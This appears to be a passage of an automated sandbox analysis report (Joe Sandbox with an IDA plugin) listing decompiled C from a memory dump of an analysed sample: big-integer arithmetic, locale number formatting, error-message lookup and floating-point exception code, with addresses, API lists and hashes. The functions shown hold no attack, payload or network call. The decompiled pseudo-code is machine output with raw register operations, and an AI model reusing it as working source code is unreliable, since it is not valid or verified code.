													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00E91C00(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00E7EA90(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00E7EA90(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xe8e4cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00E91C00( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00E8B851(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00E8B851(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00E8B851(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x00e8cebc
0x00e8cebf
0x00e8cec3
0x00e8cecd
0x00e8ced0
0x00e8ced2
0x00e8ced4
0x00e8cee1
0x00e8cee1
0x00e8cee4
0x00e8cee4
0x00e8cee7
0x00e8ceea
0x00e8ceec
0x00e8d01f
0x00e8d021
0x00e8d06a
0x00e8d06e
0x00e8d074
0x00e8d023
0x00e8d025
0x00e8d028
0x00e8d02a
0x00e8d02d
0x00e8d02f
0x00e8d031
0x00e8d065
0x00e8d065
0x00e8d065
0x00e8d033
0x00e8d038
0x00e8d03e
0x00e8d03e
0x00e8d041
0x00e8d043
0x00e8d045
0x00000000
0x00000000
0x00e8d047
0x00e8d048
0x00e8d04b
0x00e8d04e
0x00e8d050
0x00000000
0x00e8d052
0x00000000
0x00e8d052
0x00000000
0x00e8d050
0x00e8d054
0x00e8d05b
0x00e8d05f
0x00e8d063
0x00000000
0x00000000
0x00e8d063
0x00e8d066
0x00e8d066
0x00e8d068
0x00e8d075
0x00e8d078
0x00e8d07b
0x00e8d07e
0x00e8d07e
0x00e8d082
0x00e8d085
0x00e8d088
0x00e8d08b
0x00e8d096
0x00e8d08d
0x00e8d092
0x00e8d092
0x00e8d0a0
0x00e8d0a5
0x00e8d0a8
0x00e8d0aa
0x00e8d0b4
0x00e8d0b7
0x00e8d0be
0x00e8d0c1
0x00e8d0c4
0x00e8d0cc
0x00e8d0d2
0x00e8d0d2
0x00e8d0d2
0x00e8d0d2
0x00e8d0c4
0x00e8d0d7
0x00e8d0de
0x00e8d0de
0x00e8d0e1
0x00e8d0e4
0x00e8d316
0x00e8d316
0x00e8d0ea
0x00e8d0ea
0x00e8d0f0
0x00e8d0f3
0x00e8d0f6
0x00e8d0f9
0x00e8d0fc
0x00e8d0ff
0x00e8d102
0x00e8d102
0x00e8d105
0x00e8d10c
0x00e8d10c
0x00e8d107
0x00e8d107
0x00e8d107
0x00e8d10e
0x00e8d112
0x00e8d115
0x00e8d117
0x00e8d11a
0x00e8d121
0x00e8d124
0x00e8d127
0x00e8d132
0x00e8d135
0x00e8d13a
0x00e8d13f
0x00e8d146
0x00e8d14b
0x00e8d14d
0x00e8d14f
0x00e8d153
0x00e8d156
0x00e8d159
0x00e8d161
0x00e8d16a
0x00e8d16a
0x00e8d16c
0x00e8d16f
0x00e8d16f
0x00e8d159
0x00e8d179
0x00e8d17e
0x00e8d183
0x00e8d185
0x00e8d188
0x00e8d18a
0x00e8d18d
0x00e8d190
0x00e8d192
0x00e8d195
0x00e8d198
0x00e8d19a
0x00e8d1a1
0x00e8d1a6
0x00e8d1a9
0x00e8d1b3
0x00e8d1b5
0x00e8d1b7
0x00e8d1ba
0x00e8d1ba
0x00e8d1bc
0x00e8d1bf
0x00e8d1c2
0x00e8d1c5
0x00e8d1c8
0x00e8d19c
0x00e8d19c
0x00e8d19f
0x00000000
0x00000000
0x00e8d19f
0x00e8d1cb
0x00e8d1cd
0x00e8d1cf
0x00000000
0x00e8d1d1
0x00e8d1d1
0x00e8d1d4
0x00e8d1d6
0x00e8d1d6
0x00e8d1e4
0x00e8d1e7
0x00e8d1ec
0x00e8d1ee
0x00000000
0x00000000
0x00e8d1f0
0x00e8d1f7
0x00e8d1f7
0x00e8d1fa
0x00e8d1fd
0x00e8d200
0x00e8d203
0x00e8d203
0x00e8d206
0x00e8d209
0x00e8d20d
0x00e8d210
0x00e8d212
0x00e8d215
0x00000000
0x00000000
0x00e8d217
0x00e8d215
0x00e8d1f2
0x00e8d1f2
0x00e8d1f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8d1f5
0x00e8d21c
0x00e8d21c
0x00000000
0x00e8d21c
0x00e8d219
0x00000000
0x00e8d219
0x00e8d1d4
0x00e8d1cf
0x00e8d21f
0x00e8d21f
0x00e8d221
0x00e8d22b
0x00e8d22b
0x00e8d22e
0x00e8d230
0x00e8d232
0x00e8d234
0x00e8d239
0x00e8d23c
0x00e8d23c
0x00e8d23f
0x00e8d242
0x00e8d245
0x00e8d247
0x00e8d25c
0x00e8d25e
0x00e8d260
0x00e8d262
0x00e8d264
0x00e8d266
0x00e8d268
0x00e8d26a
0x00e8d26d
0x00e8d26d
0x00e8d271
0x00e8d273
0x00e8d279
0x00e8d27c
0x00e8d27c
0x00e8d27c
0x00e8d280
0x00e8d280
0x00e8d285
0x00e8d288
0x00e8d288
0x00e8d28d
0x00e8d28f
0x00e8d291
0x00e8d298
0x00e8d298
0x00e8d29a
0x00e8d29f
0x00e8d2a1
0x00e8d2a4
0x00e8d2a4
0x00e8d2a7
0x00e8d2b0
0x00e8d2b0
0x00e8d2b2
0x00e8d2b2
0x00e8d2b7
0x00e8d2bd
0x00e8d2c1
0x00e8d2c4
0x00e8d2c7
0x00e8d2c9
0x00e8d2c9
0x00e8d2c9
0x00e8d2ce
0x00e8d2ce
0x00e8d2d1
0x00e8d2d4
0x00e8d293
0x00e8d293
0x00e8d296
0x00000000
0x00000000
0x00e8d296
0x00e8d291
0x00e8d2db
0x00e8d2db
0x00e8d2dc
0x00e8d223
0x00e8d223
0x00e8d225
0x00000000
0x00000000
0x00e8d225
0x00e8d2ec
0x00e8d2f1
0x00e8d2f4
0x00e8d2f8
0x00e8d2f9
0x00e8d2fc
0x00e8d2ff
0x00e8d300
0x00e8d303
0x00e8d306
0x00e8d309
0x00e8d30c
0x00e8d30c
0x00e8d314
0x00e8d31b
0x00e8d31c
0x00e8d31e
0x00e8d320
0x00e8d322
0x00e8d325
0x00e8d330
0x00e8d330
0x00e8d336
0x00e8d336
0x00e8d339
0x00e8d33a
0x00e8d33a
0x00e8d330
0x00e8d33e
0x00e8d340
0x00e8d342
0x00e8d344
0x00e8d344
0x00e8d346
0x00e8d34a
0x00000000
0x00000000
0x00e8d34c
0x00e8d34c
0x00e8d34f
0x00e8d351
0x00000000
0x00000000
0x00000000
0x00e8d351
0x00e8d344
0x00e8d353
0x00e8d35d
0x00000000
0x00000000
0x00000000
0x00e8d068
0x00e8cef2
0x00e8cef2
0x00e8cef2
0x00e8cef5
0x00e8cef8
0x00e8cefb
0x00e8cf2c
0x00e8cf2e
0x00e8cf79
0x00e8cf7b
0x00e8cf82
0x00e8cf89
0x00e8cf8c
0x00e8cf8f
0x00e8cf95
0x00e8cf95
0x00e8cf96
0x00e8cf99
0x00e8cfa0
0x00e8cfa9
0x00e8cfae
0x00e8cfb1
0x00e8cfb6
0x00e8cfb9
0x00e8cfbb
0x00e8cfc0
0x00e8cfc3
0x00e8cfc6
0x00e8cfc6
0x00e8cfc6
0x00e8cfca
0x00e8cfcd
0x00e8cfcd
0x00e8cfd2
0x00e8cfd2
0x00e8cfdd
0x00e8cfe8
0x00e8cfe8
0x00e8cfeb
0x00e8cff7
0x00e8cffc
0x00e8d007
0x00e8d009
0x00e8d00b
0x00e8d011
0x00e8d016
0x00e8d018
0x00e8d01e
0x00e8cf30
0x00e8cf3c
0x00e8cf3c
0x00e8cf3f
0x00e8cf4f
0x00e8cf55
0x00e8cf5c
0x00e8cf5e
0x00e8cf66
0x00e8cf68
0x00e8cf6a
0x00e8cf6f
0x00e8cf72
0x00e8cf78
0x00e8cf78
0x00e8cefd
0x00e8cf00
0x00e8cf04
0x00e8cf0a
0x00e8cf19
0x00e8cf23
0x00e8cf2b
0x00e8cf2b
0x00e8cefb
0x00e8ced6
0x00e8ced9
0x00e8cedf
0x00e8cedf
0x00e8cec5
0x00e8cecb
0x00e8cecb

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c71cb9696925a17b0f1ed029d90042ab8403ec90c4966a08425d5b2b74d4a4
Instruction ID: 7d35d823688704557163daa17ebc1346afbed1dba1dd676d2c4bf4635e16867f
Opcode Fuzzy Hash: e4c71cb9696925a17b0f1ed029d90042ab8403ec90c4966a08425d5b2b74d4a4
Instruction Fuzzy Hash: 27022B71E042199BDF14DFA9C8806AEF7F1FF48324F259269D91DF7280D731AA418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A8CC Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7A8CC(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xe9e610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xebeca8 = _v304;
					 *0xebecaa = 0;
					 *0xe9e610 = 0xebeca8;
				}
				E00E70000(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xe9e600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00e7a8e4
0x00e7a8f2
0x00e7a8ff
0x00e7a907
0x00e7a90d
0x00e7a90d
0x00e7a923
0x00e7a928
0x00e7a92d
0x00e7a937
0x00e7a941
0x00e7a949
0x00e7a954

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E7A8F2
GetNumberFormatW.KERNEL32 ref: 00E7A941

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: af9bff7561ea7409b9b95ad7b551330e7f5f24f6595186c44cfaebc4968880a3
Instruction ID: 750781885c57eeef4ea2cf2131d67a1f94b1b3084b0c79b5f6a2e1cd1e664057
Opcode Fuzzy Hash: af9bff7561ea7409b9b95ad7b551330e7f5f24f6595186c44cfaebc4968880a3
Instruction Fuzzy Hash: 99014C76100248AEDB10CF66EC05BABB7A8EF59710F005423BA08B7261D3709A288BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E66EA8 Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E66EA8(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00e66ea8
0x00e66eb0
0x00000000
0x00e66ed7
0x00e66ec9
0x00e66ed1
0x00000000

APIs

GetLastError.KERNEL32(00E67016,00000000,00000400), ref: 00E66EA8
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E66EC9

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 292731a8450fbbc31c8746442670b4e4a228dbce7214e71152db99b617e12353
Instruction ID: a80e21a1556cc34d635451d44b0907d3c159503fe998d81be8c62d59809e54ea
Opcode Fuzzy Hash: 292731a8450fbbc31c8746442670b4e4a228dbce7214e71152db99b617e12353
Instruction Fuzzy Hash: D9D0A9B43D8302BEEE100B30EC06F7A3B91A705B82F20E506B342F80E0C6719128E628

Uniqueness

Uniqueness Score: -1.00%

Function 00E91464 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E91464(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00E8EDC2(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00E8ED28(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00e91472
0x00e91479
0x00e9147e
0x00e91484
0x00e91487
0x00e9148d
0x00e91492
0x00e91497
0x00e91497
0x00e9149d
0x00e914a2
0x00e914a7
0x00e914a7
0x00e914ae
0x00e914b3
0x00e914b8
0x00e914b8
0x00e914bf
0x00e914c4
0x00e914c9
0x00e914c9
0x00e914d0
0x00e914d5
0x00e914da
0x00e914da
0x00e914e2
0x00e914f2
0x00e91504
0x00e91516
0x00e91529
0x00e9153b
0x00e91543
0x00e91548
0x00e9154d
0x00e9154d
0x00e91554
0x00e91559
0x00e91559
0x00e91560
0x00e91565
0x00e91565
0x00e9156c
0x00e91571
0x00e91571
0x00e91578
0x00e9157d
0x00e9157d
0x00e91587
0x00e91589
0x00e915c3
0x00e9158b
0x00e91590
0x00e915b4
0x00e915bc
0x00e915b0
0x00e915b0
0x00e915c6
0x00e915cd
0x00e915cf
0x00e915f1
0x00e915f9
0x00e915fc
0x00e915fc
0x00e915fe
0x00e915fe
0x00e91609
0x00e9160f
0x00e91614
0x00e9161b
0x00e91655
0x00e91660
0x00e91666
0x00e91669
0x00e9166c
0x00e91678
0x00e91680
0x00e9161d
0x00e91620
0x00e9162c
0x00e91632
0x00e91638
0x00e9163b
0x00e91644
0x00e91644
0x00e91683
0x00e91691
0x00e91697
0x00e9169e
0x00e916a0
0x00e916a0
0x00e916a7
0x00e916a9
0x00e916a9
0x00e916b0
0x00e916b2
0x00e916b2
0x00e916b9
0x00e916bb
0x00e916bb
0x00e916c2
0x00e916c4
0x00e916c4
0x00e916d1
0x00e916d4
0x00e9170b
0x00e916d6
0x00e916d6
0x00e916d9
0x00e91704
0x00e916f9
0x00e916f9
0x00e9170d
0x00e91715
0x00e91718
0x00e91737
0x00e9173c
0x00e9173c
0x00e9173e
0x00e91743
0x00e9174f
0x00e91745
0x00e91748
0x00e91748
0x00e91754
0x00e91754
0x00e9171a
0x00e9171d
0x00e9172c
0x00000000
0x00e9172c
0x00e9171f
0x00e91722
0x00e91724
0x00e91724
0x00000000
0x00e91722
0x00e916db
0x00e916de
0x00e916f4
0x00000000
0x00e916f4
0x00e916e3
0x00e916e5
0x00e916e5
0x00e916e3
0x00000000
0x00e916d4
0x00e915d6
0x00e915e4
0x00e915ec
0x00000000
0x00e915ec
0x00e915da
0x00e915df
0x00e915df
0x00000000
0x00e915da
0x00e91597
0x00e915a5
0x00e915ad
0x00000000
0x00e915ad
0x00e9159b
0x00e915a0
0x00e915a0
0x00e9159b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E9145F,?,?,00000008,?,?,00E910FF,00000000), ref: 00E91691

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
